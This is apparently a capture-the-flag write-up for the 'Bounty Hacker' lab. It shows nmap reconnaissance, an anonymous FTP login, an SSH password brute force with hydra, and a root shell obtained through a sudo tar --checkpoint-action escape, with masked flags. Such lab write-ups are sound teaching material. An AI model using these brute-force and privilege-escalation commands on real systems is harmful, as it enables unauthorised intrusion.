Bounty Hacker

Room Covers:

• Service Discovery

• Local Privilege Escalation

Target Details

• IP: 10.10.160.10

Service Discovery

• Using nmap

  nmap -sV -sC -Pn -oN scan.txt 10.10.160.10

• Scan Results

  # Nmap 7.92 scan initiated Thu Jun 30 12:36:54 2022 as: nmap -sC -sV -Pn -oN scan.txt 10.10.160.10
  Nmap scan report for 10.10.160.10
  Host is up (0.39s latency).
  Not shown: 967 filtered tcp ports (no-response), 30 closed tcp ports (conn-refused)
  PORT   STATE SERVICE VERSION
  21/tcp open  ftp     vsftpd 3.0.3
  | ftp-syst:
  |   STAT:
  | FTP server status:
  |      Connected to ::ffff:10.x.x.x
  |      Logged in as ftp
  |      TYPE: ASCII
  |      No session bandwidth limit
  |      Session timeout in seconds is 300
  |      Control connection is plain text
  |      Data connections will be plain text
  |      At session startup, client count was 2
  |      vsFTPd 3.0.3 - secure, fast, stable
  |_End of status
  | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  | -rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
  |_-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
  22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
  |   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
  |_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
  80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  |_http-server-header: Apache/2.4.18 (Ubuntu)
  |_http-title: Site doesn't have a title (text/html).
  Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  
  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  # Nmap done at Thu Jun 30 12:37:34 2022 -- 1 IP address (1 host up) scanned in 40.35 seconds

• OS: Ubuntu

• Services Found

  Service	Port	Version
  HTTP	80	Apache/2.4.18
  FTP	21	vsftpd 3.0.3
  SSH	22	OpenSSH 7.2p2

Try Accessing FTP

• Trying to access FTP anonymously

  Connected to 10.10.160.10.
  220 (vsFTPd 3.0.3)
  Name (10.10.160.10:attacker): anonymous
  230 Login successful.
  Remote system type is UNIX.
  Using binary mode to transfer files.
  ftp>

• We get successfully logged in as anonymous user

• list and download files

  # list files
  ftp> ls
  200 PORT command successful. Consider using PASV.
  150 Here comes the directory listing.
  -rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
  -rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
  226 Directory send OK.
  ftp>
  
  # download all files
  ftp> mget * .
  
  # press return key whenever prompted to download

• locks.txt file appears to be a wordlist

Bruteforce SSH service

• Assuming user to be lin from task.txt file, we bruteforce this account with downloaded locks.txt file

  hydra -l lin -P locks.txt ssh://10.10.160.10

  Password: RedDr4gonxxxxxxxxx

• We've successfully found the SSH password for user lin

Login to SSH

• Login Details

  User	Password
  lin	RedDr4gonxxxxxxxxx

• Login to SSH using above details

  ssh lin@10.10.160.10

Privilege Escalation

• Find SUID files

  find / -perm -u=s -type f 2>/dev/null

• sudo can be used by lin, hence to find commands that can be used by lin and executed as root, we run below command

  sudo -l
  
  Matching Defaults entries for lin on bountyhacker:
      env_reset, mail_badpass,
      secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
  
  User lin may run the following commands on bountyhacker:
      (root) /bin/tar

  /bin/tar can be executed by lin as root

• Searching for tar on GTFObins, we can escalate privileges using below command

  sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

• Machine is now rooted

  # whoami
  root

Get Flags

• User Flag

  # cat /home/lin/Desktop/user.txt
  THM{CR1M3_xxxxxxxxx}

• Root Flag

  # cat /root/root.txt
  THM{80UN7Y_xxxxxx}